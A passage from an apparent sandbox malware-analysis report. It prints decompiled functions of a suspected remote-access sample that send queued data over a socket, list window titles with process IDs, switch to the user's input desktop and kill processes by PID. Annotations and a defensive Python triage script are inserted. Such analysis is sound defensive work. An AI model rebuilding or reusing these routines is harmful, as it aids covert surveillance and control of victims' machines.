                                                                                    						} else {
                                                                                    							if(__eflags > 0) {
                                                                                    								L8:
                                                                                    								_t76 = 0x40000;
                                                                                    								_v32 = 0;
                                                                                    							} else {
                                                                                    								__eflags = _t44 - 0x40000;
                                                                                    								if(_t44 <= 0x40000) {
                                                                                    									goto L9;
                                                                                    								} else {
                                                                                    									goto L8;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t45 = SetFilePointer(_t64, _v24, _a4, 0);
                                                                                    						__eflags = _t45 - 0xffffffff;
                                                                                    						if(_t45 != 0xffffffff) {
                                                                                    							_t21 = _t76 - 9; // -9
                                                                                    							_t46 = _t21;
                                                                                    							_v24 = _t46;
                                                                                    							__eflags = _t46;
                                                                                    							if(_t46 == 0) {
                                                                                    								goto L11;
                                                                                    							} else {
                                                                                    								_v16 = 0;
                                                                                    								_t48 = LocalAlloc(0x40, _t76);
                                                                                    								_t69 = _a4;
                                                                                    								_t77 = _t48;
                                                                                    								 *_t77 = 0x6b;
                                                                                    								 *(_t77 + 1) =  *_t69;
                                                                                    								 *(_t77 + 5) = _t69[1];
                                                                                    								_t30 = _t77 + 9; // 0x9
                                                                                    								ReadFile(_t64, _t30, _v24,  &_v16, 0);
                                                                                    								CloseHandle(_t64);
                                                                                    								_t55 = _v16;
                                                                                    								__eflags = _t55;
                                                                                    								if(_t55 == 0) {
                                                                                    									E04EB5220(_t73);
                                                                                    									LocalFree(_t77);
                                                                                    									return _v20;
                                                                                    								} else {
                                                                                    									_push(_t69);
                                                                                    									_t59 = _t55 + 9;
                                                                                    									__eflags = _t59;
                                                                                    									_push(0x4f);
                                                                                    									_push(_t59);
                                                                                    									_push(_t77);
                                                                                    									_v20 = E04EB1C60( *((intOrPtr*)(_t73 + 4)));
                                                                                    									LocalFree(_t77);
                                                                                    									return _v20;
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							L11:
                                                                                    							CloseHandle(_t64);
                                                                                    							_t65 = _t73;
                                                                                    							goto L12;
                                                                                    						}
                                                                                    					} else {
                                                                                    						return _t39;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04EB50ED
                                                                                    • GetFileSize.KERNEL32(00000000,?), ref: 04EB5111
                                                                                    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 04EB5166
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB5172
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 04EB519E
                                                                                    • ReadFile.KERNEL32(00000000,00000009,?,00000000,00000000), ref: 04EB51C5
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB51CC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000009,0000004F), ref: 04EB51ED
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB5207
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$CloseFreeHandle$AllocCreatePointerReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 1193681933-0
                                                                                    • Opcode ID: d49439b0a8bd12fb5067cb1a3c25636c15bce2a17665f8a35997c08a4f6a28d3
                                                                                    • Instruction ID: 78c5d01e3297996bec81ce079d34110166a9cf719427b813d8837e3cf5567dd5
                                                                                    • Opcode Fuzzy Hash: d49439b0a8bd12fb5067cb1a3c25636c15bce2a17665f8a35997c08a4f6a28d3
                                                                                    • Instruction Fuzzy Hash: C041B475A01205BBDB10DFA4D844BAEB7B8EB48329F10466AE955E3380D735A9008B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 80%
                                                                                    			E04ECE180(intOrPtr* __ecx) {
                                                                                    				intOrPtr _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _t43;
                                                                                    				long _t44;
                                                                                    				void* _t50;
                                                                                    				long _t52;
                                                                                    				void* _t53;
                                                                                    				void* _t63;
                                                                                    				intOrPtr _t66;
                                                                                    				intOrPtr* _t71;
                                                                                    				struct _CRITICAL_SECTION* _t76;
                                                                                    				struct _CRITICAL_SECTION* _t78;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_t71 = __ecx;
                                                                                    				// Drain the object's outbound queue: doubly linked buffer list at +0x168/+0x16c,
                                                                                    				// node count at +0x164, pending byte count at +0x180, lock at +0x14c, socket at +0x1c.
                                                                                    				while( *((intOrPtr*)(_t71 + 0x180)) > 0) {
                                                                                    					_t2 = _t71 + 0x14c; // 0x14d
                                                                                    					_t76 = _t2;
                                                                                    					EnterCriticalSection(_t76);
                                                                                    					_t63 =  *(_t71 + 0x168);
                                                                                    					if(_t63 ==  *(_t71 + 0x16c)) {
                                                                                    						if(_t63 != 0) {
                                                                                    							 *(_t71 + 0x168) = 0;
                                                                                    							 *(_t71 + 0x16c) = 0;
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t53 =  *(_t63 + 4);
                                                                                    						 *(_t71 + 0x168) = _t53;
                                                                                    						 *(_t53 + 8) = 0;
                                                                                    						L6:
                                                                                    						if(_t63 != 0) {
                                                                                    							 *(_t63 + 4) = 0;
                                                                                    							 *(_t63 + 8) = 0;
                                                                                    							 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) - 1;
                                                                                    						}
                                                                                    					}
                                                                                    					LeaveCriticalSection(_t76);
                                                                                    					if(_t63 == 0) {
                                                                                    						break;
                                                                                    					} else {
                                                                                    						_t66 =  *((intOrPtr*)(_t63 + 0x14));
                                                                                    						_t43 =  *((intOrPtr*)(_t63 + 0x18)) - _t66;
                                                                                    						__imp__#19( *((intOrPtr*)(_t71 + 0x1c)), _t66, _t43, 0); // WS2_32 ordinal 19 = send(sock, buf, len, 0); bytes sent land in _t43
                                                                                    						_v24 = _t43;
                                                                                    						if(_t43 <= 0) {
                                                                                    							if(_t43 == 0xffffffff) { // SOCKET_ERROR
                                                                                    								__imp__#111(); // WS2_32 ordinal 111 = WSAGetLastError(), result in _t43
                                                                                    								if(_t43 != 0x2733) { // 0x2733 = 10035 = WSAEWOULDBLOCK; any other error is recorded below and the loop returns 0
                                                                                    									_t36 = _t71 + 0x84; // 0x85
                                                                                    									 *((intOrPtr*)(_t71 + 0xc)) = 1;
                                                                                    									 *((intOrPtr*)(_t71 + 0x10)) = 3;
                                                                                    									 *((intOrPtr*)(_t71 + 0x14)) = _t43;
                                                                                    									 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                                                    									_t44 = E04ECC570(_t36, _t63);
                                                                                    									if(_t44 == 0) {
                                                                                    										HeapFree( *( *_t63), _t44, _t63);
                                                                                    									}
                                                                                    									return 0;
                                                                                    								} else { // WSAEWOULDBLOCK: push the node back on the queue head and stop until the socket is writable again
                                                                                    									_t25 = _t71 + 0x14c; // 0x14d
                                                                                    									_t78 = _t25;
                                                                                    									EnterCriticalSection(_t78);
                                                                                    									_t50 =  *(_t71 + 0x168);
                                                                                    									if(_t50 == 0) {
                                                                                    										 *(_t63 + 8) = 0;
                                                                                    										 *(_t63 + 4) = 0;
                                                                                    										 *(_t71 + 0x16c) = _t63;
                                                                                    									} else {
                                                                                    										 *(_t50 + 8) = _t63;
                                                                                    										 *(_t63 + 4) =  *(_t71 + 0x168);
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) + 1;
                                                                                    									 *(_t71 + 0x168) = _t63;
                                                                                    									LeaveCriticalSection(_t78);
                                                                                    									break;
                                                                                    								}
                                                                                    							} else {
                                                                                    								goto L12;
                                                                                    							}
                                                                                    						} else {
                                                                                    							EnterCriticalSection(_t76);
                                                                                    							 *((intOrPtr*)(_t71 + 0x180)) =  *((intOrPtr*)(_t71 + 0x180)) - _v28;
                                                                                    							LeaveCriticalSection(_t76);
                                                                                    							SetLastError(0);
                                                                                    							 *((intOrPtr*)( *_t71 + 0x84))( *((intOrPtr*)(_t63 + 0x14)), _v28);
                                                                                    							L12:
                                                                                    							_t24 = _t71 + 0x84; // 0x85
                                                                                    							_t52 = E04ECC570(_t24, _t63);
                                                                                    							if(_t52 == 0) {
                                                                                    								HeapFree( *( *_t63), _t52, _t63);
                                                                                    							}
                                                                                    							continue;
                                                                                    						}
                                                                                    					}
                                                                                    					L23:
                                                                                    				}
                                                                                    				return 1;
                                                                                    				goto L23;
                                                                                    			}

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000014D), ref: 04ECE1A4
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE1FB
                                                                                    • send.WS2_32(?,00000000,00000001,00000000), ref: 04ECE218
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE239
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECE241
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04ECE279
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECE284
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE2D8
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04ECE318
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$ErrorFreeHeapLast$Entersend
                                                                                    • String ID:
                                                                                    • API String ID: 1657114447-0
                                                                                    • Opcode ID: 001a89e81521b7216f7a458a12692be26673b4c1254fe04182b9f7a8d83f83ca
                                                                                    • Instruction ID: 3f37a955252aded95bb59f3ff9d790f4c2c455ae2b08ca4e7637ba408bfc6702
                                                                                    • Opcode Fuzzy Hash: 001a89e81521b7216f7a458a12692be26673b4c1254fe04182b9f7a8d83f83ca
                                                                                    • Instruction Fuzzy Hash: E6415E71200601EFD708CF69D988BA6BBE8FF45315F008259E929CB244DB75F966CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 89%
                                                                                    			// EnumWindows-style callback (HWND, LPARAM -> void** growable LocalAlloc buffer):
                                                                                    			// appends one [DWORD pid][UTF-16 title][NUL] record per visible window with a non-empty title.
                                                                                    			E04EC5080(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                                                    				signed int _v8;
                                                                                    				short _v2056;
                                                                                    				void** _v2060;
                                                                                    				signed int _t18;
                                                                                    				void** _t20;
                                                                                    				signed int _t36;
                                                                                    				struct HWND__* _t44;
                                                                                    				void* _t50;
                                                                                    				void* _t51;
                                                                                    				void* _t52;
                                                                                    				int _t53;
                                                                                    				DWORD* _t54;
                                                                                    				signed int _t56;
                                                                                    
                                                                                    				_t52 = __esi;
                                                                                    				_t18 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t18 ^ _t56;
                                                                                    				_t20 = _a8;
                                                                                    				_t44 = _a4;
                                                                                    				_t50 =  *_t20;
                                                                                    				_v2060 = _t20;
                                                                                    				E04EDDAD0(_t50,  &_v2056, 0, 0x400); // zero the 0x400-byte title buffer (memset-like helper)
                                                                                    				GetWindowTextW(_t44,  &_v2056, 0x3ff); // read the window title
                                                                                    				if(IsWindowVisible(_t44) != 0 && lstrlenW( &_v2056) != 0) { // only visible, titled windows are recorded
                                                                                    					if(_t50 == 0) {
                                                                                    						_t50 = LocalAlloc(0x40, 1); // first record: start a zero-initialised buffer
                                                                                    					}
                                                                                    					_push(_t52);
                                                                                    					_t53 = LocalSize(_t50);
                                                                                    					// grow by 4 (PID) + 2*len (UTF-16 title) + 2 (terminator) bytes
                                                                                    					_t51 = LocalReAlloc(_t50, 6 + lstrlenW( &_v2056) * 2 + _t53, 0x42);
                                                                                    					_t54 = _t53 + _t51; // new record starts at the old end
                                                                                    					GetWindowThreadProcessId(_t44, _t54); // first DWORD: owning process id
                                                                                    					_t36 = lstrlenW( &_v2056);
                                                                                    					_t15 =  &(_t54[1]); // 0x4
                                                                                    					E04EDDC90(_t15,  &_v2056, 2 + _t36 * 2); // then the title, copied right after the PID (memcpy-like helper)
                                                                                    					 *_v2060 = _t51; // hand the (possibly moved) buffer back through the LPARAM
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t56);
                                                                                    			}

                                                                                    APIs
                                                                                    • GetWindowTextW.USER32 ref: 04EC50C6
                                                                                    • IsWindowVisible.USER32 ref: 04EC50CD
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC50E2
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EC50F4
                                                                                    • LocalSize.KERNEL32 ref: 04EC50FE
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC510D
                                                                                    • LocalReAlloc.KERNEL32(?,?,00000042), ref: 04EC5120
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 04EC512C
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000042), ref: 04EC5139
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                                                    • String ID:
                                                                                    • API String ID: 925664022-0
                                                                                    • Opcode ID: 7f833d6ac3fca85a9c7a026cf338037184efec5223c0e8701f9374eaf67f20f9
                                                                                    • Instruction ID: 9427b31d98d8bbd2cb5873a81a4b47779b917445980cd96e277e8147b6329119
                                                                                    • Opcode Fuzzy Hash: 7f833d6ac3fca85a9c7a026cf338037184efec5223c0e8701f9374eaf67f20f9
                                                                                    • Instruction Fuzzy Hash: C52183B5640118ABD710DF61DD89FABB7FCFB84711F045065FA49D7140DE38AA49CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC5530(void* __ebx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v264;
                                                                                    				char _v520;
                                                                                    				long _v524;
                                                                                    				struct HDESK__* _v528;
                                                                                    				signed int _t13;
                                                                                    				struct HDESK__* _t41;
                                                                                    				void* _t43;
                                                                                    				signed int _t46;
                                                                                    
                                                                                    				// Stack-cookie prologue (security cookie XOR frame pointer); verified again on return.
                                                                                    				_t13 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t13 ^ _t46;
                                                                                    				// Name of the desktop the calling thread is attached to right now.
                                                                                    				_t43 = GetThreadDesktop(GetCurrentThreadId());
                                                                                    				_v528 = _t43;
                                                                                    				E04EDDAD0(__edi,  &_v264, 0, 0x100); // presumably a memset-style zero fill of the 256-byte name buffer
                                                                                    				GetUserObjectInformationA(_t43, 2,  &_v264, 0x100,  &_v524); // 2 = UOI_NAME
                                                                                    				// Name of the desktop that currently receives user input (0x2000000 = MAXIMUM_ALLOWED).
                                                                                    				_t41 = OpenInputDesktop(0, 0, 0x2000000);
                                                                                    				E04EDDAD0(_t41,  &_v520, 0, 0x100);
                                                                                    				GetUserObjectInformationA(_t41, 2,  &_v520, 0x100,  &_v524);
                                                                                    				// If the names differ (e.g. the input is on another desktop), move this thread
                                                                                    				// onto the input desktop so its window and screen operations target what the user sees.
                                                                                    				if(lstrcmpiA( &_v520,  &_v264) != 0) {
                                                                                    					SetThreadDesktop(_t41);
                                                                                    				}
                                                                                    				CloseDesktop(_v528);
                                                                                    				CloseDesktop(_t41); // documented to fail while a thread of this process still uses that desktop, so the handle stays valid after the switch
                                                                                    				return E04ED572E(_v8 ^ _t46); // stack-cookie check
                                                                                    			}

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                    • GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                    • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                    • GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                    • CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                    • CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3718465862-0
                                                                                    • Opcode ID: 71951129221e747d7bb8928ecdffac2d1e7c50bdecf985ad87686a26a7e676db
                                                                                    • Instruction ID: 6fc49cc79fa7ef0321549e8a71e54a185c56aab568cd86c1b69eeb9b9aaa63df
                                                                                    • Opcode Fuzzy Hash: 71951129221e747d7bb8928ecdffac2d1e7c50bdecf985ad87686a26a7e676db
                                                                                    • Instruction Fuzzy Hash: 9821A8B594022C7BEB11DB61DC49FEA777CEB44711F100196FE45E7181DAB46E848FA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 33%
                                                                                    			E04EC4320(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                    				// _a4: array of DWORD process IDs; _a8: byte length of that array.
                                                                                    				intOrPtr _v8;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* _t16;
                                                                                    				int _t17;
                                                                                    				int _t20;
                                                                                    				void* _t28;
                                                                                    				intOrPtr _t31;
                                                                                    				void* _t34;
                                                                                    				void* _t36;
                                                                                    				void* _t39;
                                                                                    				void* _t40;
                                                                                    				void* _t42;
                                                                                    
                                                                                    				_t31 = __ecx;
                                                                                    				_push(__ecx);
                                                                                    				_t28 = _a8;
                                                                                    				_push(_t39);
                                                                                    				_t36 = 0;
                                                                                    				_v8 = __ecx;
                                                                                    				// Step 1: kill every process named in the PID list (_t36 is the byte offset into the array).
                                                                                    				if(_t28 != 0) {
                                                                                    					do {
                                                                                    						_t39 = OpenProcess(0x1fffff, 0,  *(_t36 + _a4)); // 0x1fffff = PROCESS_ALL_ACCESS
                                                                                    						TerminateProcess(_t39, 0);
                                                                                    						CloseHandle(_t39);
                                                                                    						_t36 = _t36 + 4;
                                                                                    					} while (_t36 < _t28);
                                                                                    				}
                                                                                    				// Step 2: wait 100 ms, collect a LocalAlloc'd result from E04EC4BC0 and hand it to E04EB1C60
                                                                                    				// together with its size and the constant 0x3f. E04EB1C60 is not in this excerpt; the call
                                                                                    				// shape (context field +4, buffer, length, tag) is that of a send/dispatch routine.
                                                                                    				Sleep(0x64);
                                                                                    				_t40 = E04EC4BC0(_t28, _t34, _t36, _t39);
                                                                                    				if(_t40 != 0) {
                                                                                    					_t20 = LocalSize(_t40);
                                                                                    					_push(_t31);
                                                                                    					_push(0x3f);
                                                                                    					_push(_t20);
                                                                                    					_push(_t40);
                                                                                    					_t31 =  *((intOrPtr*)(_v8 + 4));
                                                                                    					E04EB1C60(_t31);
                                                                                    					LocalFree(_t40);
                                                                                    				}
                                                                                    				// Step 3: enumerate top-level windows. The callback E04EC5080 (listed above: GetWindowTextW,
                                                                                    				// IsWindowVisible, GetWindowThreadProcessId, LocalAlloc/LocalReAlloc) grows a buffer of
                                                                                    				// window titles and owning PIDs in _a8. Its first byte is overwritten with 0x82 before the
                                                                                    				// buffer is passed to the same helper, so 0x82 reads as a record/command identifier.
                                                                                    				_a8 = 0;
                                                                                    				EnumWindows(E04EC5080,  &_a8);
                                                                                    				_t16 = _a8;
                                                                                    				if(_t16 != 0) {
                                                                                    					 *_t16 = 0x82;
                                                                                    					_t42 = _a8;
                                                                                    					if(_t42 != 0) {
                                                                                    						_t17 = LocalSize(_t42);
                                                                                    						_push(_t31);
                                                                                    						_push(0x3f);
                                                                                    						_push(_t17);
                                                                                    						_push(_t42);
                                                                                    						E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    						_t16 = LocalFree(_t42);
                                                                                    					}
                                                                                    				}
                                                                                    				return _t16;
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC4340
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC434B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC4352
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EC4274,?,?), ref: 04EC4361
                                                                                    • LocalSize.KERNEL32 ref: 04EC437F
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,04EC4274,?,?), ref: 04EC4392
                                                                                    • EnumWindows.USER32(04EC5080,?), ref: 04EC43A4
                                                                                    • LocalSize.KERNEL32 ref: 04EC43BC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,04EC4274,?,?), ref: 04EC43CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$FreeProcessSize$CloseEnumHandleOpenSleepTerminateWindows
                                                                                    • String ID:
                                                                                    • API String ID: 1695776769-0
                                                                                    • Opcode ID: f4fd36489e36ec98e4e04a8b3131e7f3bdeca066ca92d60b658720ce4b6a4baa
                                                                                    • Instruction ID: 48ff2dc44c62663eec4227098a5fecfbedacf1817d15dbd4fdb9857d92fdce8e
                                                                                    • Opcode Fuzzy Hash: f4fd36489e36ec98e4e04a8b3131e7f3bdeca066ca92d60b658720ce4b6a4baa
                                                                                    • Instruction Fuzzy Hash: 3111D531601214BBD711AF9ADD45FAE776CEF85750F014119FD1497280CB74BE018BE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
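The two routines above (E04EC5530 switching the thread to the input desktop, E04EC4320 terminating a PID list and then enumerating window titles and owning PIDs) can be triaged directly from the report's API cross-reference lines rather than from the disassembly. The following Python is an added example, not part of this report or of the analysed sample: it parses lines in the report's own "• Api.MODULE(args), ref: ADDR" format, groups the calls into behaviour clusters (the cluster names and helper names are chosen here), and decodes the literal arguments the decompilation shows (0x1FFFFF, 0x02000000, 0x42, 0x64). The sample lines are copied from the listings above.

```python
"""Triage helper for sandbox-report API cross-reference lists (added example,
not part of the report or the sample). Groups calls into behaviour clusters
and decodes constant arguments using winnt.h / winbase.h values."""
import re
from collections import defaultdict

# Constructed input: API lines copied from the listings in this report.
SAMPLE_API_LINES = """
• GetCurrentThreadId.KERNEL32 ref: 04EC5548
• GetThreadDesktop.USER32(00000000), ref: 04EC554F
• GetUserObjectInformationA.USER32 ref: 04EC558F
• OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
• lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
• SetThreadDesktop.USER32(00000000), ref: 04EC55E9
• CloseDesktop.USER32(?), ref: 04EC55FD
• OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC4340
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC434B
• Sleep.KERNEL32(00000064,?,?,?,?,?,04EC4274,?,?), ref: 04EC4361
• EnumWindows.USER32(04EC5080,?), ref: 04EC43A4
• GetWindowTextW.USER32 ref: 04EC50C6
• GetWindowThreadProcessId.USER32(?,00000000), ref: 04EC512C
• LocalReAlloc.KERNEL32(?,?,00000042), ref: 04EC5120
"""

API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)"   # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"            # optional (arg,arg,...) ; '?' = unresolved
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"   # ref: call-site address
)

# OpenProcess access rights (winnt.h). 0x1FFFFF is PROCESS_ALL_ACCESS on Vista+.
PROCESS_RIGHTS = {
    "PROCESS_TERMINATE": 0x0001, "PROCESS_CREATE_THREAD": 0x0002,
    "PROCESS_SET_SESSIONID": 0x0004, "PROCESS_VM_OPERATION": 0x0008,
    "PROCESS_VM_READ": 0x0010, "PROCESS_VM_WRITE": 0x0020,
    "PROCESS_DUP_HANDLE": 0x0040, "PROCESS_CREATE_PROCESS": 0x0080,
    "PROCESS_SET_QUOTA": 0x0100, "PROCESS_SET_INFORMATION": 0x0200,
    "PROCESS_QUERY_INFORMATION": 0x0400, "PROCESS_SUSPEND_RESUME": 0x0800,
    "PROCESS_QUERY_LIMITED_INFORMATION": 0x1000,
    "PROCESS_SET_LIMITED_INFORMATION": 0x2000, "DELETE": 0x10000,
    "READ_CONTROL": 0x20000, "WRITE_DAC": 0x40000, "WRITE_OWNER": 0x80000,
    "SYNCHRONIZE": 0x100000,
}
MAXIMUM_ALLOWED = 0x02000000
LMEM_FLAGS = {"LMEM_MOVEABLE": 0x0002, "LMEM_ZEROINIT": 0x0040}

# Behaviour clusters (names chosen for this example); every API must be present.
BEHAVIOURS = {
    "switch thread to the input desktop": {"OpenInputDesktop", "SetThreadDesktop"},
    "terminate processes from a PID list": {"OpenProcess", "TerminateProcess"},
    "enumerate window titles and owning PIDs": {
        "EnumWindows", "GetWindowTextW", "GetWindowThreadProcessId"},
}


def _hex(token):
    """Parse a hex argument token; '?' (unresolved by the sandbox) becomes None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_api_lines(text):
    """Return one dict per API line: api, module, raw arg tokens and ref (int)."""
    calls = []
    for m in API_LINE.finditer(text):
        raw = m.group("args") or ""
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": [a for a in raw.split(",") if a],
                      "ref": int(m.group("ref"), 16)})
    return calls


def behaviours(calls):
    """Map each cluster whose APIs all occur to the sorted call sites involved."""
    sites = defaultdict(list)
    for c in calls:
        sites[c["api"]].append(c["ref"])
    return {name: sorted(r for api in req for r in sites[api])
            for name, req in BEHAVIOURS.items() if req.issubset(sites)}


def decode_flags(mask, table):
    """Split a bitmask into named flags plus any unnamed remainder (as hex)."""
    names = [n for n, bit in table.items() if mask & bit]
    rest = mask & ~sum(table.values())
    return names + ([f"0x{rest:X}"] if rest else [])


def annotate_constants(calls):
    """Explain the literal arguments visible in the decompiled calls, keyed by ref."""
    notes = {}
    for c in calls:
        api, args, ref = c["api"], c["args"], c["ref"]
        if api == "OpenProcess" and args and _hex(args[0]) is not None:
            notes[ref] = "access=" + "|".join(decode_flags(_hex(args[0]), PROCESS_RIGHTS))
        elif api == "OpenInputDesktop" and len(args) >= 3 and _hex(args[2]) == MAXIMUM_ALLOWED:
            notes[ref] = "desired access=MAXIMUM_ALLOWED"
        elif api == "LocalReAlloc" and len(args) >= 3 and _hex(args[2]) is not None:
            notes[ref] = "flags=" + "|".join(decode_flags(_hex(args[2]), LMEM_FLAGS))
        elif api == "Sleep" and args and _hex(args[0]) is not None:
            notes[ref] = f"sleep {_hex(args[0])} ms"
    return notes


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for name, refs in behaviours(parsed).items():
        print(name + ": " + ", ".join(f"{r:08X}" for r in refs))
    for ref, note in sorted(annotate_constants(parsed).items()):
        print(f"  {ref:08X}  {note}")
```

The clusters require every listed API to appear, which keeps a lone CloseHandle or Sleep from firing anything; the flag decoder reports bits it cannot name (0x1FFFFF carries 0xC000 beyond the named PROCESS_* rights) rather than silently dropping them.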

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC2680(intOrPtr* __ecx) {
                                                                                    				intOrPtr _t25;
                                                                                    				int _t29;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t34;
                                                                                    				struct HICON__** _t37;
                                                                                    				void* _t38;
                                                                                    
                                                                                    				// Destructor-style teardown: the object's first dword (vtable pointer) is reset, then every
                                                                                    				// GDI and heap resource it owns is released. The handle set (window DC, memory DCs, GDI
                                                                                    				// objects, 16 cursors) is consistent with a screen-capture or remote-view object; that is
                                                                                    				// inferred from the handles alone, not shown elsewhere in this excerpt.
                                                                                    				_t33 = __ecx;
                                                                                    				 *__ecx = 0x4efdcb4;
                                                                                    				ReleaseDC( *(__ecx + 0x104),  *(__ecx + 0x3c)); // window handle at +0x104, its DC at +0x3c
                                                                                    				DeleteDC( *(_t33 + 0x40)); // four memory DCs
                                                                                    				DeleteDC( *(_t33 + 0x44));
                                                                                    				DeleteDC( *(_t33 + 0x48));
                                                                                    				DeleteDC( *(_t33 + 0x78));
                                                                                    				DeleteObject( *(_t33 + 0x4c)); // three GDI objects (bitmaps selected into the DCs above, presumably)
                                                                                    				DeleteObject( *(_t33 + 0x50));
                                                                                    				DeleteObject( *(_t33 + 0x7c));
                                                                                    				_t25 =  *((intOrPtr*)(_t33 + 0x14));
                                                                                    				if(_t25 != 0) {
                                                                                    					E04ED573F(_t25); // heap free; the following +4 stack adjust shows a cdecl call
                                                                                    					_t38 = _t38 + 4;
                                                                                    				}
                                                                                    				E04ED573F( *((intOrPtr*)(_t33 + 0x60)));
                                                                                    				E04ED573F( *((intOrPtr*)(_t33 + 0x5c)));
                                                                                    				E04ED573F( *((intOrPtr*)(_t33 + 0x64)));
                                                                                    				_t37 = _t33 + 0xc4;
